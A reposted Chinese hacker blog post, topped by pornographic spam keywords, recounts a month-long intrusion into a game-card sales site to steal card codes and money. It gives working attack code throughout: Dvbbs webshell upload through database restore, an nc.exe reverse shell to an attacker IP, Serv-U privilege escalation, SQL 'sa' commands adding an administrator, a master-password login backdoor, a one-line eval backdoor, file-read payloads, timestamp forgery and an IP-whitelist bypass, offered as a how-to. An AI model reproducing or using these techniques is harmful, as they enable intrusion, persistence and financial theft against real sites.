日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

黑客与网管的30天较量

發布時間:2025/7/14 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 黑客与网管的30天较量 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

作者:★世界末日★
性質:原創

前題:

本文章技術含量并非很高,但涉及到的思路及知識應用點希望可以幫助一部份和偶這樣菜的菜鳥.

正文開始:

11月20號下午四時許,天色已漸降臨,還有四個多小時才下班,閑著也是閑著,到<幼兒園>群里看看吧,潛水幾天了 ^_^

群里的人就是牛B,各大網站的站長都有,N年前牛B的人也在,當然,吹牛B的一部份也不少.

嗯,聊了幾分鐘,聊到了在網上黑大網站掛木馬,搞站賣shell,搞各種銷售站點賣錢的話題,干脆有個黑人把17173.com.cn的shell也發了出來,牛B得不得了,偶對他的敬仰真是有如江水滔滔不絕,又如長江決提一發不可......

現在的黑人們,大多數都走向職業化,所謂的職業化,也只不過是應用掌握的技術,搞點錢花花吧!

此時心里想,其實這也沒有什么不對的,搞技術的,不靠技術賺點錢,就算一份工作,一個月拿那么點工資,有技術不等于沒有?想到這里,于是順便打聽了一些好友的"賺錢"路子,有的說黑大網站掛木馬偷帳號賣給游戲玩家賺錢,有的說直接去黑各游戲私服服務器,直接賣裝備,有的說黑各站點的整站賣錢...... 另一朋友司徒對我說,其實也可以去搞一些游戲點卡銷售的站點,直接拿點卡就OK了,聽了不禁有些心動。畢竟偶接觸這方面的人多,路子也多......

好吧,動手。

打開IE,www.google.com,輸入:“點卡在線銷售”。

出現的站點可還真不少,看來,網游的產業在互聯上的地位非同一般了,賺網錢的人也多了起來,嗯,偶們也賺去,^_^ , 這樣的站,什么云網,卡天地....多得數不清,不過偶們懶得數,看上了一個界面不錯的,試著拿他開刀吧。

站上有ASP,PHP的頁面,馬上想起看能不能用SQL注入,沒辦法,習慣了,SQL注入鬧得昏昏烈烈,試一下吧。

http://xxxx/card_show.asp?id=56
http://xxxx/card_show.asp?id=56'
顯示:請不要嘗試“',--,select,mid*********"之類的字符,XXX防SQL注入專用系統!我曰,太陽!還專用防SQL注入呢,沒門。

失敗,拿出SuperScan掃幾個常用端口,開放的端口21,80,1433

Faint!

嘗試旁侵,打開旁注專用工具。

掃出10多個國際域名.

呵呵,我不信你10多個站沒一個有洞,GO,逐一檢查.....

用旁注工具檢測了一通,看那些站包括:
dvbbs/dvbbs6.mdb
bbs/upfile.asp
upload_soft.asp
之類的頁面,一分鐘過去了,程序顯示完成,昏倒,一個都沒有。
一個個打開那些站點看看的時候,差點沒把我氣死。TMD,10幾個域名差不多全部指向同一個站,我倒!

再仔細的觀察一次,有一個站是私服的主頁,我昏哦,難道服務器上還有私服?其中一個超連接是<本站論壇>,低落的情緒馬上爆漲起來,點一下進去看看。
http://xxxx/Xsfbbs/index.asp
本頁面需要cookies支持,如果你的瀏覽器不支持cookies將不能登陸本系統。。。。

一看就知道是動網的,他的二級路徑是XsfBBS,怪不得剛才檢測不到,暈。希望論壇可以找到突破口了。

3秒鐘過去,論壇打開了,逼不及待馬上看最下面那幾行字:

####
Powered By :Dvbbs Version 7.0.0
?2003-2004 XXXXXXXXX網::網站聲明及發帖須知:: 聯系QQ:XXXXXXX
執行時間:62.50000毫秒。查詢數據庫2次。 當前模板樣式:[默認模板]
####

(小刀評論:建議直接訪問upfile.asp文件來判斷是否存在上傳漏洞,因為SP2補丁有兩個,第一個是沒有補上傳漏洞的)

哇,不是sp2??不是吧???那偶不是可以抓包上傳ASP?高興中。。。

馬上注了一個帳號,shijiemori/pass,登陸..

打開 WSockExpert (一個專用的抓包分析等軟件)抓了登陸后的cookies,再拿出老兵的《動網漏洞上傳工具》,填表上COOKIE,填上http://www.XXXX.com/Xsfbbs/upfile.asp,點擊上傳。。。。那個激動呀!

(小刀評論:嘻嘻,這里犯了一個錯誤,其實是不用抓COOKIES的,直接上傳就行了,可以的小末,每次都抓包,同情ING....)

3秒鐘過去,程序返回的信息:對不起,你發帖數量必須大于0才能上傳文件。

太陽!靠,肯定是TMD打了sp2的補丁,TMD怎么下面沒改回來,誤人子弟,欺騙偶滴感情??辤ng....

(小刀評論:沒有打補丁,只是管理員作了限制)

天哪,你怎么可以這樣對偶捏?再找找其它的站,都是指向那卡站,昏哦,難道真沒辦法了啊?

再分析一下吧,實在不行就放棄,天下何處無芳草,留得處男在,那怕***** @_@

累了,吃飯先。。。。。。。。。。。。

半小時后,偶回來了,站長,偶這下子吃飽,喝足鳥,又回來鳥。

繼續分析,這下不知道是不是吃飽喝足的原因,突然發現論壇下面的QQ聯系人和其它網站的都一個樣,HOHO`原來站長乃是同一人物。習慣性來說,他的各個地方的密碼都是一樣滴`偶嘗試一下看能不能猜他密碼先。

點擊了那管理員的帳號,看一下他個人資料,QQ:“XXXXXXX”,個人簽名檔里寫著:“XXX我愛你,就像老鼠愛大米”。

當機立斷,加了他的QQ,無意中發現他QQ資料也是這樣寫,“XXXX我愛你”,XXXX是一個MM名字,他郵箱是XXXXX@163.com,去他郵箱看看。
打開mail.163.com,點忘記密碼?輸入他的用戶名。到他QQ里找他的生日年月,填了上去,哈哈,果然正確,第二步,回答問題,問題是,我最愛的人。答案我填了XXX(他QQ資料里那MM的名字),一點,哈哈,正確了,我靠啊,真TMD爽啊。這下子,我拿到了他的郵箱。時間是剛好7點。Yeah!

郵箱拿到了,郵箱里也沒什么,哈哈,就算有,對偶的幫助也不一定很大滴說,突然靈機一動,他的論壇密碼會不會是??????
你真聰明,猜對了,我們到他論壇的登陸頁面,敲入他的用戶名,密碼是XXXwoaini,登陸-->登陸成功!

哈哈,那個激動啊,明天得去把六合彩,體育彩票,通通買光,讓TMD關門。做個世界首富不成問題滴說,到時豪華個人飛機,出出入入身邊PLMM一大片,晚上一個,早上一個,吃飯一個,逛街二個 @_@? @_@? .........
噢,忘了,進后臺先,找到文件上傳類型,加上個|asp,哈哈,到首頁那個帖先。。。

嗯,點擊上傳我可愛的asp木馬.......

唔?唔?怎么上傳不了?靠,倒?唔??我加了asp類型呀,怎么還不能上傳???再試一次,還是失敗,我倒。后來才發現,動網sp2就算在后臺加了|asp|cer|cdx|asa之類的文件擴展名,也是不能上傳滴,我,太陽!這下子悶郁死了,N久不用動網,算是偶孤陋寡聞鳥。。偶還沒死心,下一步,動網不是有個數據庫備份功能嗎?用這個功能來實現圖片與ASP之前的轉換可不OK?

(小刀評論:其實從7.0的最初版開始,已經限制了后臺添加ASP上傳類型,所以不用試這步了,直接備份數據庫就行了,時間也差不多)

嗯,馬上動手。

先到首頁發個帖,把我的 "ASP木馬.asp" 改名成"asp.jpg"

發帖上傳,現在是JPG格式的文件,看你丫的讓不讓偶上傳 ^_^

顯示上傳成功,不過上傳后的文件名是jpg的,偶不管,記下路徑先。


此主題相關圖片如下:

再回到數據庫里找還原數據庫的頁面。HOHO~~ 好像成功在即。

嗯,點了一下[還原數據庫]的超連接,頁面出來了,但!!哦?嗯??嗯??????怎么沒有恢復功能啊??我靠,原來這個論壇是TMD是SQL數據庫的,我倒!!!這不分明是損我嗎?天哪,怎么這樣子對偶捏??

再次郁悶......

沒辦法,得向群求救。

通過一個朋友得知,原來這樣也要以運用數據庫的[還原功能],嘿嘿,心動了吧?怎么弄呢?我們繼續:

在桌面新建一個wokao.htm,里面的代碼是:

<form action="http://XXXX/bbs/admin_data.asp?action=RestoreData&act=Restore" method="post">
<p>上傳后的圖片地址:<input name="Dbpath" type="text" size="80" value="UploadFile/2004-12/20041120192715291.gif"></p>
<p>木馬保存地址:<input name="backpath" type="text" size="80" value="shijiemori.asp"></p>
<p><input type="submit" value="提交"></p>
</form>
'代碼結束

上面的<from action=" " 這里的地址填上對方論壇絕對地址/admin_data.aspadmin_data.asp?action=RestoreData&act=Restore,Dbpath文件本筐里填表上上傳后的馬馬圖片地址,比如我傳的圖片地址是UploadFile/2004-12/20041120192715291.gif, backpath 文本筐里填寫你要保存的馬馬地址,比如shijiemori.asp。
然后要做的就是點提交了,要是你運氣比偶還差的話,那。。。。 要不然你肯定可以成功,成功后提示,數據庫還原成功。
哈哈,好了,成功就好,可以訪問我的馬馬了,還想啥?哈!!!
打開
http://XXXX/UploadFile/shijiemori.asp???? //這是偶滴馬馬地址
點密碼進去。啊嘎嘎.

這樣就完成了入侵的第一步,下面直接要做的就是拿那個站的卡啦。

屬話說得好哇!留得處男在 ,那怕*******,哈,不辛運的日子已時過境遷,偶已經改頭換面,從失魂落魄緊張低落到情緒高漲,又大難不死,必有后福 ^_^ ,說了這么多,都是為了表示對管理員的硬盤不作權限設定而偶是多么多么的開心,吼吼!!

第一件事當然是到shell里找找他開了那些服務

net start

已經啟動以下 Windows 服務:

?? Application Layer Gateway Service
?? Automatic Updates
?? Background Intelligent Transfer Service
?? COM+ Event System
?? Computer Browser
?? Cryptographic Services
?? Distributed File System
?? Distributed Link Tracking Client
?? Distributed Transaction Coordinator
?? DNS Client
?? Error Reporting Service
?? Event Log
?? FTP Publishing Service
?? GhostStartService
?? Help and Support
?? IIS Admin Service
?? IPSEC Services
?? Logical Disk Manager
?? Microsoft Search
?? MSSQLSERVER
?? MSSQLServerOLAPService
?? Network Connections
?? Network Location Awareness (NLA)
?? NT LM Security Support Provider
?? Plug and Play
?? Print Spooler
?? Protected Storage
?? Remote Procedure Call (RPC)
?? Remote Registry
?? Routing and Remote Access
?? Secondary Logon
?? Security Accounts Manager
?? Serv-U FTP Server
?? Server
?? Shell Hardware Detection
?? System Event Notification
?? Task Scheduler
?? TCP/IP NetBIOS Helper
?? Terminal Services
?? Windows Audio
?? Windows Management Instrumentation
?? Windows Time
?? WinHTTP Web Proxy Auto-Discovery Service
?? Wireless Configuration
?? Workstation
?? World Wide Web Publishing Service

命令成功完成。

hohoho,注意到倒數第8條了嗎?TMD開了終端,竟把端口改了,再輸入命令。

netstat -an


Active Connections

? Proto? Local Address????????? Foreign Address??????? State
? TCP??? 0.0.0.0:21???????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 0.0.0.0:80???????????? 0.0.0.0:0????????????? LISTENING
.......
? TCP??? 0.0.0.0:3247?????????? 0.0.0.0:0????????????? LISTENING
? TCP??? 127.0.0.1:3721???????? 0.0.0.0:0????????????? LISTENING
? TCP??? 127.0.0.1:1433???????? 0.0.0.0:0????????????? LISTENING
? TCP??? 127.0.0.1:43958??????? 0.0.0.0:0????????????? LISTENING
.......
? TCP??? xxx.xxx.xxx.xxx:21???? 219.137.65.165:1916??? ESTABLISHED
? TCP??? xxx.xxx.xxx.xxx:80???? 61.49.255.129:4047???? ESTABLISHED
? TCP??? xxx.xxx.xxx.xxx:80???? 61.145.209.148:2277??? ESTABLISHED
? TCP??? xxx.xxx.xxx.xxx:80???? 61.149.12.214:14816??? ESTABLISHED
***************************
(以下省略)

(小刀評論:如果有執行權限的話,建議用c3389.exe這個小程序,直接顯示出終端服務的端口,要不就netstat -an -p tcp)

嘗試了一下幾個端口連接,最后確定,3721是真正的終端端口,小樣還是win2003系統。hhoo.

馬上提升權限,問小刀借了個serv-u5.2版本以下的Serv-U本地權限提升程序和一個nc.exe

(小刀評論:對Serv-u6.0也通用)

先反彈回來一個shell,在對方系統上輸入d:\www\wwwroot\nc.exe -e cmd.exe xxx.xxx.xxx.xxx 4321

在本機c:\nc.exe -vv -l -p 4321

shell馬上就回來了,執行提升命令,d:\www\wwwroot\servulocal.exe "d:\www\wwwroot\nc.exe -l -p 99 -e cmd.exe"

不過,很抱謙,執行不成功,為啥?因為他的FTP不存在漏洞,補丁早打了,Faint!

接著回去他的卡站目錄,查看一下CONN.ASP文件(通常網站連接數據庫都用此文件名),內容如下:

Session.Timeout=115
if request("b_rules")=1 then
Response.Buffer = True
else
Response.Buffer = True
Response.ExpiresAbsolute = Now() - 1
Response.Expires = 0
Response.CacheControl = "no-cache"
end if
sitetitle=" - 點卡在線銷售系統"

?dim conn??
?dim connstr??
?on error resume next

?connstr = "driver={sql server};server=localhost;uid=sa;pwd=XXXwoaini;database=cardsbuy;"

?set conn=server.createobject("ADODB.CONNECTION")
?if err.number<>0 then
??err.clear
??set conn=nothing
??response.write "數據庫連接出錯!"
??Response.End
?else
??conn.open connstr
??if err then
???err.clear
???set conn=nothing
???response.write "數據庫連接出錯!"
???Response.End
??end if
?end if??
?
?sub endConnection()
??conn.close
??set conn=nothing
?end sub
##############################
看到這里我不禁笑了出來,數據庫用SA連接。管理員還真TMD可愛呀,嗯,他不小心,偶開心。hoho..

馬上找出SQLexec (一個遠程的SQL連接工具),填上用戶,密碼,連接成功。
打入命令
net user shijimori hack /add
命令成功完成。
net localgroup administrators shijiemori /add
命令成功完成。

(小刀評論:偶更喜歡用藍芒的那個SQLTOOLS)

馬上連接對方的終端,填表上用戶,密碼,OK,進去鳥,哈哈......

習慣性第一件事要做的,克隆一下guest帳號(克隆帳號的方法可去www.cnsu.org找“克隆管理員帳號就可獲得相關資料),然后注銷,用guest登陸,刪掉剛才那個用戶的登陸記錄及用戶。
打開他的SQL企業管理器,所有的帳號馬上逞現在眼前,嘿嘿嘿,先把他的SQL數據庫備份一下,然后拉回本地,在本地裝個SQL數據庫,再把他的數據庫還原到本地,這下子輕松多了。
不過,他的密碼是MD5加密的,想用他們客戶的帳號進去買東西,還得一個一個改MD5密碼,昏,麻煩。
后來便寫了一個專門讀卡的小小ASP頁面,放上去,直接顯示卡號密碼,爽。。留了幾個ASP木馬,沖了幾十個QB。
這時候也差不多到時間下班了,嗯。擦擦屁股走人先。。。


這樣,讀卡頁面一直用,過了7天。。。。。。。。。

11月28號

再次登陸那個卡站的時候,發現讀卡頁面被刪,一下子心跳起來,既然被發現了,一不做二不休,把他的錢花光,轉帳。

找到了一個一級管理員的帳號,改了他的密碼,把他的帳號余額一萬多元,全部轉到esales自己用戶上。并且向自己的QQ中轉帳一千多個QB.

當時真傻,這樣的事情都做得出來,原來,在他們系統里轉帳還得經過他總后臺同意,這樣一來,我暴露了自己的QQ和esales的帳戶。

###############
11月29日下午上線的時候,發現QQ里來了10多條這樣的信息:

用戶xxxxxxxx請求你通過身份驗證

附加消息:公安已經立案了 IP地址他們已經查到了 丟了2000多元卡

用戶xxxxxxxx請求你通過身份驗證

附加消息:這些錢 都是這個IP地址的人賠給我 公安已經保證過了

用戶xxxxxxxx請求你通過身份驗證

附加消息:還要另外賠給我電話費等100元 我勝利了:}

用戶xxxxxxxx請求你通過身份驗證

附加消息:你們的 世界末日し要到了

................
..............
............
###############


當時緊張了3秒,然后恢復平靜,那站長說的是實話?還是恐嚇之類的話,他不怕人家格他硬盤?

呵呵,怕他是小鳥,我們繼續,換了一個韓國肉雞,登陸他的終端,發現我的guest密碼已經不對了。

還好,SA還能連得上去,還可以加用戶,哈哈哈。馬上加了一個用戶,又上終端,在他的login.asp(登陸頁面)找到這么一句,加了這么一句話:

if trim(rst("userpassword"))<>trim(md5(request("password"))) then
response.write("<script>alert('帳號或密碼錯誤!請確認后再提交。');history.go(-1)</script>")
response.end
end if


這是登陸驗證頁面,我在這句代碼了做了些手腳,把代碼改成:

if trim(rst("userpassword"))<>trim(md5(request("password"))) then
password1=request("password")
if password1<>"shijiemori" then
response.write("<script>alert('帳號或密碼錯誤!請確認后再提交。 (Err=0103)');history.go(-1)</script>")
response.end
end if
end if

這句意思是說,當檢測到對方的密碼不正確,并且提交的密碼不是"shijiemori"的時候才顯示密碼錯誤,也就是說,我用任何一個用戶,輸入shijiemori這個密碼,他都是正確的。哈哈。這就成了“萬能密碼”
今天特意在他一個比較隱蔽的地方,再放了一個ASP后門,以后每次都用這個后門登陸,并且修改他的硬盤資料。
同時也在N個頁面里放了一句這樣的代碼(一句話后門):
<%
shijiemori=request("shijiemori")
if shijiemori="trun" then
execute request("o")
end if
%>
注:上面這句話功能非常強大,文章后面再作介紹.


12月7日

當我再登陸后門的時候,發現后門也已經被刪了,faint,心想管理員已經嚴重發現了我的存在。

沒關系,在他的index.asp里,我還有一句話后門。在本地構建一個提交post.htm頁面,內容如下:

<form action=http://XXXX/index.asp method=post>
<input type="hidden" name="system" value="shijiemori">
<textarea name=o cols=120 rows=10 width=45>set lP=server.CreateObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request("p")
lP.SaveToFile server.mappath("shijiemori.asp"),2
lP.Close
set lP=nothing
response.redirect "shijiemori.asp"
</textarea>
<textarea name=p cols=120 rows=10 width=45>木馬</textarea><BR><center><br>
<input type=submit value=提交></form>

'代碼完成

把上面的“木馬”改成你的木馬代碼,點擊上傳,就會在跟目錄寫入一個shijiemori.asp的木馬,便可以用
http://XXXX/shijiemori.asp登陸

這樣,我還是對他的服務器有看管理的權力。

12月12日

我把讀卡面頁設為本地讀取,在本地連接他的SQL服務器,本地操作相當于遠程操作,加錢,或增加用戶,或管理數據庫,呵呵。

12月14日

對方SQL服務器已經不對外了,心想是他發現了外部的連接,曰!他只對LOCALHOST開放,再 日。連不上去了,沒辦法,還得上去他服務器。

通過前面一句話木馬我們還可以寫木馬進去,但是。。。。。。。。。但是。。。。。。。。。。。

寫進去的木馬幾分鐘后就被刪了,原來,管理員對硬盤的文件實時監控,一發現有新增的文件或新修改的文件,都去檢查一遍。

所以,我不敢寫木馬了,但,我還是可以用他的帳號并且萬能密碼進去取卡。hoho.

這里我想聰明的你一定會問,為什么他沒發現我登陸的頁面做了手腳?因為,我修改了那個文件的修改日期。

修改文件的日期程序目前我發現有2個,一個GUI界面,一個DOS,小刀給偶滴。比如把c:\windows\system32\cmd.exe的建立日期修改為2004年12月24日,這樣管理員就不容易查出來啦。
所以,我的后門逃過此劫。
12月17日

對方重裝了系統,所有的硬盤分區都不可寫。只能讀,昏倒。不能寫還能做什么?你一定會問。

這里,我得嚴重介紹剛才一句話目馬的應用了。

在本地構造提交頁面fso.htm,內容如下:

<form action=http://xxxx/index.asp method=post>
<input type="hidden" name="system" value="mori">
<textarea name=o cols=120 rows=10 width=45>response.write "<textarea rows=""9"" name=""s1"" cols=""43"">"
set FsObj=Server.CreateOBject("Scripting.FileSystemObject")
filepath="D:\www\wwwroot\conn.asp"
Set txtsObj = FsObj.openTextFile(FilePath,1,false)
if txtsObj.atEndOfStream then
Response.write "No file"
else
Response.Write txtsObj.Readall
end if
response.write "</textarea>"
</textarea> <BR><center><br>
<input type=submit value=提交></form>

'代碼完成

點擊提交,這樣就把D:\www\wwwroot\conn.asp的內容顯示了出來,呵呵。。。

得到數據庫連接文件后我們可以執行任何數據庫命令。

比如

conn.execute ("update admin set password='123456' where username='admin'")
改管理員密碼。
這樣子我還是照樣可以拿他數據庫的用戶列表或卡哈哈。

12月22日

管理員瘋了,在首頁和登陸頁面上把所有人的IP都禁止,只給他的客戶訪問,當客戶聯系他并且提供客戶的IP地址給他的時候,他便把客戶的IP寫進數據庫驗證,偶又進不去鳥。其中,驗證代碼如下:

<!--#include file="conn.asp"-->
<%
'IP限制函數
dim rs,str1,str2,str3,str4,num,sip,movieip
sip=Request.ServerVariables("HTTP_X_FORWARDED_FOR")
if sip="" then sip=Request.ServerVariables("REMOTE_ADDR")
? if isnumeric(left(sip,2)) then
?? str1=left(sip,instr(sip,".")-1)
?if str1<100 then
? str1=cint(str1)+300
?end if
?? sip=mid(sip,instr(sip,".")+1)
?? str2=left(sip,instr(sip,".")-1)
?? sip=mid(sip,instr(sip,".")+1)
?? str3=left(sip,instr(sip,".")-1)
?? str4=mid(sip,instr(sip,".")+1)
??? if isNumeric(str1)=0 or isNumeric(str2)=0 or isNumeric(str3)=0 or isNumeric(str4)=0 then
??? else
???? num=cint(str1)*256*256*256+cint(str2)*256*256+cint(str3)*256+cint(str4)-1
???? set rs=conn.execute("select id from [lockip] where ip1<="&num&" and ip2>="&num&" ")
?????? if rs.eof and rs.bof then
??????? movieip=1
?????? else
??????? movieip=0?
?????? end if
rs.close
set rs=nothing
end if
end if

'IP限制
if movieip=1 then
?response.write "<script>alert('您的IP已經被限制不能訪問,請和管理員聯系!');</script><script>window.close();</script>"
?response.end
end if
%>

呵呵,真BT,不過,你夠BT,偶們也BT,行動,構造以下ip.htm代碼提交:
下面的XXXXX.asp是偶另一個后門 ^_^

<form action=http://xxxx/XXXXX.asp method=post>
<input type="hidden" name="system" value="mori">
<textarea name=o cols=120 rows=10 width=45>
'以下把我的IP段按他的算法格式寫入數據庫,我看你牛不牛。
conn.execute ("Update lockip set ip1='365820xxxx',ip2='365820xxxx' where id='1'")</textarea> <BR><center><br>
<input type=submit value=提交></form>

這樣就可以把你的IP寫到他數據庫,也就可以正常訪問了。哈哈!!!!!!!!

至于以后偶怎么對待這個服務器,下次再寫。

12月24日

這篇文章隨著生蛋節而蛋生。真心希望以上的心得及代碼對大家有所幫助。謝謝。。。

??????????????????? ----世界末日---- QQ:36117077? 原創

?

(小刀評論:總得來說,這篇文章寫得還不錯,思路挺妙的,運氣也有很大成份,也有一定的原創精神.,嘻嘻)

轉載于:https://www.cnblogs.com/webcool/archive/2005/01/17/92819.html

總結

以上是生活随笔為你收集整理的黑客与网管的30天较量的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。